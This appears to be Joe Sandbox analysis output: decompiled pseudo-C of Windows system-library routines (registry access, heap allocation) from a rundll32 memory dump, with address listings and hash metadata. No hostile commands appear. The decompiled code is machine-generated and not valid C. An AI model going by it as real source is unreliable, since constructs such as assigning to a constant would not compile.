                                                                                            					_v12 = _v12 | 0xffffffff;
                                                                                            					_t58 = _t120 + 0x24;
                                                                                            					_t109 =  *(_t120 + 0x18);
                                                                                            					_t118 = _t58;
                                                                                            					_v16 = _t58;
                                                                                            					E045EB02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                                                            					_v52 = 0x18;
                                                                                            					_v48 = 0;
                                                                                            					0x840 = 0x40;
                                                                                            					if( *0x46c7c1c != 0) {
                                                                                            					}
                                                                                            					_v40 = 0x840;
                                                                                            					_v44 = _t105;
                                                                                            					_v36 = 0;
                                                                                            					_v32 = 0;
                                                                                            					if(E045F7D50() != 0) {
                                                                                            						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            					} else {
                                                                                            						_t64 = 0x7ffe0384;
                                                                                            					}
                                                                                            					if( *_t64 != 0) {
                                                                                            						_t65 =  *[fs:0x30];
                                                                                            						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                                                            						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                                                            							_t100 = E045F7D50();
                                                                                            							__eflags = _t100;
                                                                                            							if(_t100 == 0) {
                                                                                            								_t101 = 0x7ffe0385;
                                                                                            							} else {
                                                                                            								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                            							}
                                                                                            							__eflags =  *_t101 & 0x00000020;
                                                                                            							if(( *_t101 & 0x00000020) != 0) {
                                                                                            								_t118 = _t118 | 0xffffffff;
                                                                                            								_t109 = 0x1485;
                                                                                            								E04657016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            					_t105 = 0;
                                                                                            					while(1) {
                                                                                            						_push(0x60);
                                                                                            						_push(5);
                                                                                            						_push( &_v64);
                                                                                            						_push( &_v52);
                                                                                            						_push(0x100021);
                                                                                            						_push( &_v12);
                                                                                            						_t122 = E04619830();
                                                                                            						if(_t122 >= 0) {
                                                                                            							break;
                                                                                            						}
                                                                                            						__eflags = _t122 - 0xc0000034;
                                                                                            						if(_t122 == 0xc0000034) {
                                                                                            							L38:
                                                                                            							_t120 = 0xc0000135;
                                                                                            							break;
                                                                                            						}
                                                                                            						__eflags = _t122 - 0xc000003a;
                                                                                            						if(_t122 == 0xc000003a) {
                                                                                            							goto L38;
                                                                                            						}
                                                                                            						__eflags = _t122 - 0xc0000022;
                                                                                            						if(_t122 != 0xc0000022) {
                                                                                            							break;
                                                                                            						}
                                                                                            						__eflags = _t105;
                                                                                            						if(__eflags != 0) {
                                                                                            							break;
                                                                                            						}
                                                                                            						_t109 = _t119;
                                                                                            						_t99 = E046569A6(_t119, __eflags);
                                                                                            						__eflags = _t99;
                                                                                            						if(_t99 == 0) {
                                                                                            							break;
                                                                                            						}
                                                                                            						_t105 = _t105 + 1;
                                                                                            					}
                                                                                            					if( !_t120 >= 0) {
                                                                                            						L22:
                                                                                            						_t56 = _t120;
                                                                                            						goto L23;
                                                                                            					}
                                                                                            					if( *0x46c7c04 != 0) {
                                                                                            						_t118 = _v12;
                                                                                            						_t120 = E0465A7AC(_t119, _t118, _t109);
                                                                                            						__eflags = _t120;
                                                                                            						if(_t120 >= 0) {
                                                                                            							goto L10;
                                                                                            						}
                                                                                            						__eflags =  *0x46c7bd8;
                                                                                            						if( *0x46c7bd8 != 0) {
                                                                                            							L20:
                                                                                            							if(_v12 != 0xffffffff) {
                                                                                            								_push(_v12);
                                                                                            								E046195D0();
                                                                                            							}
                                                                                            							goto L22;
                                                                                            						}
                                                                                            					}
                                                                                            					L10:
                                                                                            					_push(_v12);
                                                                                            					_t105 = _t119 + 0xc;
                                                                                            					_push(0x1000000);
                                                                                            					_push(0x10);
                                                                                            					_push(0);
                                                                                            					_push(0);
                                                                                            					_push(0xf);
                                                                                            					_push(_t105);
                                                                                            					_t120 = E046199A0();
                                                                                            					if(_t120 < 0) {
                                                                                            						__eflags = _t120 - 0xc000047e;
                                                                                            						if(_t120 == 0xc000047e) {
                                                                                            							L51:
                                                                                            							_t74 = E04653540(_t120);
                                                                                            							_t119 = _v16;
                                                                                            							_t120 = _t74;
                                                                                            							L52:
                                                                                            							_t118 = 0x1485;
                                                                                            							E045DB1E1(_t120, 0x1485, 0, _t119);
                                                                                            							goto L20;
                                                                                            						}
                                                                                            						__eflags = _t120 - 0xc000047f;
                                                                                            						if(_t120 == 0xc000047f) {
                                                                                            							goto L51;
                                                                                            						}
                                                                                            						__eflags = _t120 - 0xc0000462;
                                                                                            						if(_t120 == 0xc0000462) {
                                                                                            							goto L51;
                                                                                            						}
                                                                                            						_t119 = _v16;
                                                                                            						__eflags = _t120 - 0xc0000017;
                                                                                            						if(_t120 != 0xc0000017) {
                                                                                            							__eflags = _t120 - 0xc000009a;
                                                                                            							if(_t120 != 0xc000009a) {
                                                                                            								__eflags = _t120 - 0xc000012d;
                                                                                            								if(_t120 != 0xc000012d) {
                                                                                            									_v28 = _t119;
                                                                                            									_push( &_v56);
                                                                                            									_push(1);
                                                                                            									_v24 = _t120;
                                                                                            									_push( &_v28);
                                                                                            									_push(1);
                                                                                            									_push(2);
                                                                                            									_push(0xc000007b);
                                                                                            									_t79 = E0461AAF0();
                                                                                            									__eflags = _t79;
                                                                                            									if(_t79 >= 0) {
                                                                                            										__eflags =  *0x46c8474 - 3;
                                                                                            										if( *0x46c8474 != 3) {
                                                                                            											 *0x46c79dc =  *0x46c79dc + 1;
                                                                                            										}
                                                                                            									}
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            						goto L52;
                                                                                            					}
                                                                                            					if(E045F7D50() != 0) {
                                                                                            						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            					} else {
                                                                                            						_t83 = 0x7ffe0384;
                                                                                            					}
                                                                                            					if( *_t83 != 0) {
                                                                                            						_t84 =  *[fs:0x30];
                                                                                            						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                                                            						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                                                            							_t94 = E045F7D50();
                                                                                            							__eflags = _t94;
                                                                                            							if(_t94 == 0) {
                                                                                            								_t95 = 0x7ffe0385;
                                                                                            							} else {
                                                                                            								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                            							}
                                                                                            							__eflags =  *_t95 & 0x00000020;
                                                                                            							if(( *_t95 & 0x00000020) != 0) {
                                                                                            								E04657016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                                                            						if( *0x46c8708 != 0) {
                                                                                            							_t118 =  *0x7ffe0330;
                                                                                            							_t123 =  *0x46c7b00; // 0x0
                                                                                            							asm("ror esi, cl");
                                                                                            							 *0x46cb1e0(_v12, _v20, 0x20);
                                                                                            							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                                                            							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                                                            							asm("sbb esi, esi");
                                                                                            							_t120 =  ~_t50 & _t93;
                                                                                            						} else {
                                                                                            							_t120 = 0;
                                                                                            						}
                                                                                            					}
                                                                                            					if( !_t120 >= 0) {
                                                                                            						L19:
                                                                                            						_push( *_t105);
                                                                                            						E046195D0();
                                                                                            						 *_t105 =  *_t105 & 0x00000000;
                                                                                            						goto L20;
                                                                                            					}
                                                                                            					_t120 = E045E7F65(_t119);
                                                                                            					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                                                            						__eflags = _t120;
                                                                                            						if(_t120 < 0) {
                                                                                            							goto L19;
                                                                                            						}
                                                                                            						 *(_t119 + 0x64) = _v12;
                                                                                            						goto L22;
                                                                                            					}
                                                                                            					goto L19;
                                                                                            				}
                                                                                            			}









































                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 41e0de8db2d403f0d00caa3eb2354b02970d423523b3d1ba2a4a76be9a85734d
                                                                                            • Instruction ID: ed6f308180ed34892525d4ac8eb05c3dc9fffe411e3b759ee6d50effcf9d8723
                                                                                            • Opcode Fuzzy Hash: 41e0de8db2d403f0d00caa3eb2354b02970d423523b3d1ba2a4a76be9a85734d
                                                                                            • Instruction Fuzzy Hash: B8914371E00255AFEF259F68D845BAE7BA0EB45728F054266E910AB3E1FB34BD00C785
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 67%
                                                                                            			E045DC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                                                            				signed int _v8;
                                                                                            				char _v1036;
                                                                                            				signed int _v1040;
                                                                                            				char _v1048;
                                                                                            				signed int _v1052;
                                                                                            				signed char _v1056;
                                                                                            				void* _v1058;
                                                                                            				char _v1060;
                                                                                            				signed int _v1064;
                                                                                            				void* _v1068;
                                                                                            				intOrPtr _v1072;
                                                                                            				void* _v1084;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				intOrPtr _t70;
                                                                                            				intOrPtr _t72;
                                                                                            				signed int _t74;
                                                                                            				intOrPtr _t77;
                                                                                            				signed int _t78;
                                                                                            				signed int _t81;
                                                                                            				void* _t101;
                                                                                            				signed int _t102;
                                                                                            				signed int _t107;
                                                                                            				signed int _t109;
                                                                                            				signed int _t110;
                                                                                            				signed char _t111;
                                                                                            				signed int _t112;
                                                                                            				signed int _t113;
                                                                                            				signed int _t114;
                                                                                            				intOrPtr _t116;
                                                                                            				void* _t117;
                                                                                            				char _t118;
                                                                                            				void* _t120;
                                                                                            				char _t121;
                                                                                            				signed int _t122;
                                                                                            				signed int _t123;
                                                                                            				signed int _t125;
                                                                                            
                                                                                            				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                                                            				_v8 =  *0x46cd360 ^ _t125;
                                                                                            				_t116 = _a4;
                                                                                            				_v1056 = _a16;
                                                                                            				_v1040 = _a24;
                                                                                            				if(E045E6D30( &_v1048, _a8) < 0) {
                                                                                            					L4:
                                                                                            					_pop(_t117);
                                                                                            					_pop(_t120);
                                                                                            					_pop(_t101);
                                                                                            					return E0461B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                                                            				}
                                                                                            				_t70 = _a20;
                                                                                            				if(_t70 >= 0x3f4) {
                                                                                            					_t121 = _t70 + 0xc;
                                                                                            					L19:
                                                                                            					_t107 =  *( *[fs:0x30] + 0x18);
                                                                                            					__eflags = _t107;
                                                                                            					if(_t107 == 0) {
                                                                                            						L60:
                                                                                            						_t68 = 0xc0000017;
                                                                                            						goto L4;
                                                                                            					}
                                                                                            					_t72 =  *0x46c7b9c; // 0x0
                                                                                            					_t74 = L045F4620(_t107, _t107, _t72 + 0x180000, _t121);
                                                                                            					_v1064 = _t74;
                                                                                            					__eflags = _t74;
                                                                                            					if(_t74 == 0) {
                                                                                            						goto L60;
                                                                                            					}
                                                                                            					_t102 = _t74;
                                                                                            					_push( &_v1060);
                                                                                            					_push(_t121);
                                                                                            					_push(_t74);
                                                                                            					_push(2);
                                                                                            					_push( &_v1048);
                                                                                            					_push(_t116);
                                                                                            					_t122 = E04619650();
                                                                                            					__eflags = _t122;
                                                                                            					if(_t122 >= 0) {
                                                                                            						L7:
                                                                                            						_t114 = _a12;
                                                                                            						__eflags = _t114;
                                                                                            						if(_t114 != 0) {
                                                                                            							_t77 = _a20;
                                                                                            							L26:
                                                                                            							_t109 =  *(_t102 + 4);
                                                                                            							__eflags = _t109 - 3;
                                                                                            							if(_t109 == 3) {
                                                                                            								L55:
                                                                                            								__eflags = _t114 - _t109;
                                                                                            								if(_t114 != _t109) {
                                                                                            									L59:
                                                                                            									_t122 = 0xc0000024;
                                                                                            									L15:
                                                                                            									_t78 = _v1052;
                                                                                            									__eflags = _t78;
                                                                                            									if(_t78 != 0) {
                                                                                            										L045F77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                                                            									}
                                                                                            									_t68 = _t122;
                                                                                            									goto L4;
                                                                                            								}
                                                                                            								_t110 = _v1056;
                                                                                            								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                            								_v1060 = _t118;
                                                                                            								__eflags = _t110;
                                                                                            								if(_t110 == 0) {
                                                                                            									L10:
                                                                                            									_t122 = 0x80000005;
                                                                                            									L11:
                                                                                            									_t81 = _v1040;
                                                                                            									__eflags = _t81;
                                                                                            									if(_t81 == 0) {
                                                                                            										goto L15;
                                                                                            									}
                                                                                            									__eflags = _t122;
                                                                                            									if(_t122 >= 0) {
                                                                                            										L14:
                                                                                            										 *_t81 = _t118;
                                                                                            										goto L15;
                                                                                            									}
                                                                                            									__eflags = _t122 - 0x80000005;
                                                                                            									if(_t122 != 0x80000005) {
                                                                                            										goto L15;
                                                                                            									}
                                                                                            									goto L14;
                                                                                            								}
                                                                                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                                                            								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                                                            									goto L10;
                                                                                            								}
                                                                                            								_push( *((intOrPtr*)(_t102 + 8)));
                                                                                            								_t59 = _t102 + 0xc; // 0xc
                                                                                            								_push(_t110);
                                                                                            								L54:
                                                                                            								E0461F3E0();
                                                                                            								_t125 = _t125 + 0xc;
                                                                                            								goto L11;
                                                                                            							}
                                                                                            							__eflags = _t109 - 7;
                                                                                            							if(_t109 == 7) {
                                                                                            								goto L55;
                                                                                            							}
                                                                                            							_t118 = 4;
                                                                                            							__eflags = _t109 - _t118;
                                                                                            							if(_t109 != _t118) {
                                                                                            								__eflags = _t109 - 0xb;
                                                                                            								if(_t109 != 0xb) {
                                                                                            									__eflags = _t109 - 1;
                                                                                            									if(_t109 == 1) {
                                                                                            										__eflags = _t114 - _t118;
                                                                                            										if(_t114 != _t118) {
                                                                                            											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                            											_v1060 = _t118;
                                                                                            											__eflags = _t118 - _t77;
                                                                                            											if(_t118 > _t77) {
                                                                                            												goto L10;
                                                                                            											}
                                                                                            											_push(_t118);
                                                                                            											_t56 = _t102 + 0xc; // 0xc
                                                                                            											_push(_v1056);
                                                                                            											goto L54;
                                                                                            										}
                                                                                            										__eflags = _t77 - _t118;
                                                                                            										if(_t77 != _t118) {
                                                                                            											L34:
                                                                                            											_t122 = 0xc0000004;
                                                                                            											goto L15;
                                                                                            										}
                                                                                            										_t111 = _v1056;
                                                                                            										__eflags = _t111 & 0x00000003;
                                                                                            										if((_t111 & 0x00000003) == 0) {
                                                                                            											_v1060 = _t118;
                                                                                            											__eflags = _t111;
                                                                                            											if(__eflags == 0) {
                                                                                            												goto L10;
                                                                                            											}
                                                                                            											_t42 = _t102 + 0xc; // 0xc
                                                                                            											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                                                            											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                                                            											_push(_t111);
                                                                                            											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                                                            											_push(0);
                                                                                            											_push( &_v1048);
                                                                                            											_t122 = E046113C0(_t102, _t118, _t122, __eflags);
                                                                                            											L44:
                                                                                            											_t118 = _v1072;
                                                                                            											goto L11;
                                                                                            										}
                                                                                            										_t122 = 0x80000002;
                                                                                            										goto L15;
                                                                                            									}
                                                                                            									_t122 = 0xc0000024;
                                                                                            									goto L44;
                                                                                            								}
                                                                                            								__eflags = _t114 - _t109;
                                                                                            								if(_t114 != _t109) {
                                                                                            									goto L59;
                                                                                            								}
                                                                                            								_t118 = 8;
                                                                                            								__eflags = _t77 - _t118;
                                                                                            								if(_t77 != _t118) {
                                                                                            									goto L34;
                                                                                            								}
                                                                                            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                                            								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                                            									goto L34;
                                                                                            								}
                                                                                            								_t112 = _v1056;
                                                                                            								_v1060 = _t118;
                                                                                            								__eflags = _t112;
                                                                                            								if(_t112 == 0) {
                                                                                            									goto L10;
                                                                                            								}
                                                                                            								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                                                            								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                                                            								goto L11;
                                                                                            							}
                                                                                            							__eflags = _t114 - _t118;
                                                                                            							if(_t114 != _t118) {
                                                                                            								goto L59;
                                                                                            							}
                                                                                            							__eflags = _t77 - _t118;
                                                                                            							if(_t77 != _t118) {
                                                                                            								goto L34;
                                                                                            							}
                                                                                            							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                                            							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                                            								goto L34;
                                                                                            							}
                                                                                            							_t113 = _v1056;
                                                                                            							_v1060 = _t118;
                                                                                            							__eflags = _t113;
                                                                                            							if(_t113 == 0) {
                                                                                            								goto L10;
                                                                                            							}
                                                                                            							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                                                            							goto L11;
                                                                                            						}
                                                                                            						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                            						__eflags = _t118 - _a20;
                                                                                            						if(_t118 <= _a20) {
                                                                                            							_t114 =  *(_t102 + 4);
                                                                                            							_t77 = _t118;
                                                                                            							goto L26;
                                                                                            						}
                                                                                            						_v1060 = _t118;
                                                                                            						goto L10;
                                                                                            					}
                                                                                            					__eflags = _t122 - 0x80000005;
                                                                                            					if(_t122 != 0x80000005) {
                                                                                            						goto L15;
                                                                                            					}
                                                                                            					L045F77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                                                            					L18:
                                                                                            					_t121 = _v1060;
                                                                                            					goto L19;
                                                                                            				}
                                                                                            				_push( &_v1060);
                                                                                            				_push(0x400);
                                                                                            				_t102 =  &_v1036;
                                                                                            				_push(_t102);
                                                                                            				_push(2);
                                                                                            				_push( &_v1048);
                                                                                            				_push(_t116);
                                                                                            				_t122 = E04619650();
                                                                                            				if(_t122 >= 0) {
                                                                                            					__eflags = 0;
                                                                                            					_v1052 = 0;
                                                                                            					goto L7;
                                                                                            				}
                                                                                            				if(_t122 == 0x80000005) {
                                                                                            					goto L18;
                                                                                            				}
                                                                                            				goto L4;
                                                                                            			}










































                                                                                            0x04647a9b
                                                                                            0x04647a9b
                                                                                            0x04647a9e
                                                                                            0x04647aa1
                                                                                            0x04647bbe
                                                                                            0x04647bbe
                                                                                            0x04647bc0
                                                                                            0x04647be0
                                                                                            0x04647be0
                                                                                            0x04647a01
                                                                                            0x04647a01
                                                                                            0x04647a05
                                                                                            0x04647a07
                                                                                            0x04647a15
                                                                                            0x04647a15
                                                                                            0x04647a1a
                                                                                            0x00000000
                                                                                            0x04647a1a
                                                                                            0x04647bc2
                                                                                            0x04647bc6
                                                                                            0x04647bc9
                                                                                            0x04647bcd
                                                                                            0x04647bcf
                                                                                            0x046479e6
                                                                                            0x046479e6
                                                                                            0x046479eb
                                                                                            0x046479eb
                                                                                            0x046479ef
                                                                                            0x046479f1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046479f3
                                                                                            0x046479f5
                                                                                            0x046479ff
                                                                                            0x046479ff
                                                                                            0x00000000
                                                                                            0x046479ff
                                                                                            0x046479f7
                                                                                            0x046479fd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046479fd
                                                                                            0x04647bd5
                                                                                            0x04647bd8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647ba9
                                                                                            0x04647bac
                                                                                            0x04647bb0
                                                                                            0x04647bb1
                                                                                            0x04647bb1
                                                                                            0x04647bb6
                                                                                            0x00000000
                                                                                            0x04647bb6
                                                                                            0x04647aa7
                                                                                            0x04647aaa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647ab2
                                                                                            0x04647ab3
                                                                                            0x04647ab5
                                                                                            0x04647aec
                                                                                            0x04647aef
                                                                                            0x04647b25
                                                                                            0x04647b28
                                                                                            0x04647b62
                                                                                            0x04647b64
                                                                                            0x04647b8f
                                                                                            0x04647b92
                                                                                            0x04647b96
                                                                                            0x04647b98
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647b9e
                                                                                            0x04647b9f
                                                                                            0x04647ba3
                                                                                            0x00000000
                                                                                            0x04647ba3
                                                                                            0x04647b66
                                                                                            0x04647b68
                                                                                            0x04647ae2
                                                                                            0x04647ae2
                                                                                            0x00000000
                                                                                            0x04647ae2
                                                                                            0x04647b6e
                                                                                            0x04647b72
                                                                                            0x04647b75
                                                                                            0x04647b81
                                                                                            0x04647b85
                                                                                            0x04647b87
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647b31
                                                                                            0x04647b34
                                                                                            0x04647b3c
                                                                                            0x04647b45
                                                                                            0x04647b46
                                                                                            0x04647b4f
                                                                                            0x04647b51
                                                                                            0x04647b57
                                                                                            0x04647b59
                                                                                            0x04647b59
                                                                                            0x00000000
                                                                                            0x04647b59
                                                                                            0x04647b77
                                                                                            0x00000000
                                                                                            0x04647b77
                                                                                            0x04647b2a
                                                                                            0x00000000
                                                                                            0x04647b2a
                                                                                            0x04647af1
                                                                                            0x04647af3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647afb
                                                                                            0x04647afc
                                                                                            0x04647afe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647b00
                                                                                            0x04647b03
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647b05
                                                                                            0x04647b09
                                                                                            0x04647b0d
                                                                                            0x04647b0f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647b18
                                                                                            0x04647b1d
                                                                                            0x00000000
                                                                                            0x04647b1d
                                                                                            0x04647ab7
                                                                                            0x04647ab9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647abf
                                                                                            0x04647ac1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647ac3
                                                                                            0x04647ac6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647ac8
                                                                                            0x04647acc
                                                                                            0x04647ad0
                                                                                            0x04647ad2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647adb
                                                                                            0x00000000
                                                                                            0x04647adb
                                                                                            0x046479d6
                                                                                            0x046479d9
                                                                                            0x046479dc
                                                                                            0x04647a91
                                                                                            0x04647a94
                                                                                            0x00000000
                                                                                            0x04647a94
                                                                                            0x046479e2
                                                                                            0x00000000
                                                                                            0x046479e2
                                                                                            0x04647a74
                                                                                            0x04647a7a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04647a8a
                                                                                            0x04647a21
                                                                                            0x04647a21
                                                                                            0x00000000
                                                                                            0x04647a21
                                                                                            0x045dc650
                                                                                            0x045dc651
                                                                                            0x045dc656
                                                                                            0x045dc65c
                                                                                            0x045dc65d
                                                                                            0x045dc663
                                                                                            0x045dc664
                                                                                            0x045dc66a
                                                                                            0x045dc66e
                                                                                            0x046479c5
                                                                                            0x046479c7
                                                                                            0x00000000
                                                                                            0x046479c7
                                                                                            0x045dc67a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 293f33555e0c98222ac00fd435fdc0ab61336a1f8a1590df6e7ba23241fb67a7
                                                                                            • Instruction ID: 93b05446e7908172b9d013bee22d9e17e952f978b4ef423a4d0023936d81920e
                                                                                            • Opcode Fuzzy Hash: 293f33555e0c98222ac00fd435fdc0ab61336a1f8a1590df6e7ba23241fb67a7
                                                                                            • Instruction Fuzzy Hash: 65819C756442468BDF25CE58C880A6AB3A4FFD4355F18486AED459B380F330FD85CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 39%
                                                                                            			E0466B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                                                            				char _v8;
                                                                                            				signed int _v12;
                                                                                            				signed int _t80;
                                                                                            				signed int _t83;
                                                                                            				intOrPtr _t89;
                                                                                            				signed int _t92;
                                                                                            				signed char _t106;
                                                                                            				signed int* _t107;
                                                                                            				intOrPtr _t108;
                                                                                            				intOrPtr _t109;
                                                                                            				signed int _t114;
                                                                                            				void* _t115;
                                                                                            				void* _t117;
                                                                                            				void* _t119;
                                                                                            				void* _t122;
                                                                                            				signed int _t123;
                                                                                            				signed int* _t124;
                                                                                            
                                                                                            				_t106 = _a12;
                                                                                            				if((_t106 & 0xfffffffc) != 0) {
                                                                                            					return 0xc000000d;
                                                                                            				}
                                                                                            				if((_t106 & 0x00000002) != 0) {
                                                                                            					_t106 = _t106 | 0x00000001;
                                                                                            				}
                                                                                            				_t109 =  *0x46c7b9c; // 0x0
                                                                                            				_t124 = L045F4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                                                            				if(_t124 != 0) {
                                                                                            					 *_t124 =  *_t124 & 0x00000000;
                                                                                            					_t124[1] = _t124[1] & 0x00000000;
                                                                                            					_t124[4] = _t124[4] & 0x00000000;
                                                                                            					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                                                            						L13:
                                                                                            						_push(_t124);
                                                                                            						if((_t106 & 0x00000002) != 0) {
                                                                                            							_push(0x200);
                                                                                            							_push(0x28);
                                                                                            							_push(0xffffffff);
                                                                                            							_t122 = E04619800();
                                                                                            							if(_t122 < 0) {
                                                                                            								L33:
                                                                                            								if((_t124[4] & 0x00000001) != 0) {
                                                                                            									_push(4);
                                                                                            									_t64 =  &(_t124[1]); // 0x4
                                                                                            									_t107 = _t64;
                                                                                            									_push(_t107);
                                                                                            									_push(5);
                                                                                            									_push(0xfffffffe);
                                                                                            									E046195B0();
                                                                                            									if( *_t107 != 0) {
                                                                                            										_push( *_t107);
                                                                                            										E046195D0();
                                                                                            									}
                                                                                            								}
                                                                                            								_push(_t124);
                                                                                            								_push(0);
                                                                                            								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                            								L37:
                                                                                            								L045F77F0();
                                                                                            								return _t122;
                                                                                            							}
                                                                                            							_t124[4] = _t124[4] | 0x00000002;
                                                                                            							L18:
                                                                                            							_t108 = _a8;
                                                                                            							_t29 =  &(_t124[0x105]); // 0x414
                                                                                            							_t80 = _t29;
                                                                                            							_t30 =  &(_t124[5]); // 0x14
                                                                                            							_t124[3] = _t80;
                                                                                            							_t123 = 0;
                                                                                            							_t124[2] = _t30;
                                                                                            							 *_t80 = _t108;
                                                                                            							if(_t108 == 0) {
                                                                                            								L21:
                                                                                            								_t112 = 0x400;
                                                                                            								_push( &_v8);
                                                                                            								_v8 = 0x400;
                                                                                            								_push(_t124[2]);
                                                                                            								_push(0x400);
                                                                                            								_push(_t124[3]);
                                                                                            								_push(0);
                                                                                            								_push( *_t124);
                                                                                            								_t122 = E04619910();
                                                                                            								if(_t122 != 0xc0000023) {
                                                                                            									L26:
                                                                                            									if(_t122 != 0x106) {
                                                                                            										L40:
                                                                                            										if(_t122 < 0) {
                                                                                            											L29:
                                                                                            											_t83 = _t124[2];
                                                                                            											if(_t83 != 0) {
                                                                                            												_t59 =  &(_t124[5]); // 0x14
                                                                                            												if(_t83 != _t59) {
                                                                                            													L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                                                            												}
                                                                                            											}
                                                                                            											_push( *_t124);
                                                                                            											E046195D0();
                                                                                            											goto L33;
                                                                                            										}
                                                                                            										 *_a16 = _t124;
                                                                                            										return 0;
                                                                                            									}
                                                                                            									if(_t108 != 1) {
                                                                                            										_t122 = 0;
                                                                                            										goto L40;
                                                                                            									}
                                                                                            									_t122 = 0xc0000061;
                                                                                            									goto L29;
                                                                                            								} else {
                                                                                            									goto L22;
                                                                                            								}
                                                                                            								while(1) {
                                                                                            									L22:
                                                                                            									_t89 =  *0x46c7b9c; // 0x0
                                                                                            									_t92 = L045F4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                                                            									_t124[2] = _t92;
                                                                                            									if(_t92 == 0) {
                                                                                            										break;
                                                                                            									}
                                                                                            									_t112 =  &_v8;
                                                                                            									_push( &_v8);
                                                                                            									_push(_t92);
                                                                                            									_push(_v8);
                                                                                            									_push(_t124[3]);
                                                                                            									_push(0);
                                                                                            									_push( *_t124);
                                                                                            									_t122 = E04619910();
